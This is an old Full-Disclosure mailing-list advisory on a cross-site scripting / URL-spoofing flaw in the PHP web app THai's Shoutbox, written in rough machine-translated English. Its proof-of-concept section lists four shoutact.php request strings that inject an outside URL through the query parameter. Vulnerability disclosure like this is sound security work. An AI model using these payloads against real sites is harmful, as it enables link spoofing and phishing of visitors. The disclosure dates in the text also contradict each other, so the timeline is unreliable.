-=[--------------------ADVISORY-------------------]=- -=[ ]=- -=[ THai's Shoutbox ]=- -=[ ]=- -=[ Author: CorryL www.x0n3-h4ck.org ]=- -=[ ]=- -=[----------------------------------------------------]=- -=[+] Application: THai's Shoutbox -=[+] Version: not available -=[+] Vendor's URL: not available -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: XSS spoofing url -=[+] Exploitation: Remote/Local -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck ..::[ Descriprion ]::.. THai's Shoutbox and' a small glass showcase where the consumers of his/her own site can leave messages, and' very easy to use and to install, it doesn't need database mysql ..::[ Bug ]::.. this application and' he/she cuts from a bug type XSS a remote attaccker it is able' to exploit this bug for spoofing a malignant url ..::[ Proof Of Concept ]::.. /shoutact.php?yousay=default&query=http://www.x0n3-h4ck.org /shoutact.php?yousay=default&name=default&query=http://www.x0n3-h4ck.org /shoutact.php?yousay=default&email=default&query=http://www.x0n3-h4ck.org /shoutact.php?yousay=default&email=default&name=default&query=http://www.x0n 3-h4ck.org ..::[ Workaround ]::.. Vendor not avaliable ..::[ Disclousure Timeline ]::.. [27/03/2005] - No patch relase from vendor (not avaliable) [27/02/2005] - Public disclousure CorryL corryl80@gmail.com www.x0n3-h4ck.org Italian Security Team Fax (+39) 02700520894 Tel (+39) 06452215277 irc.xoned.net #x0n3-h4ck _________________________________ www.seekstat.it is your web stat _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/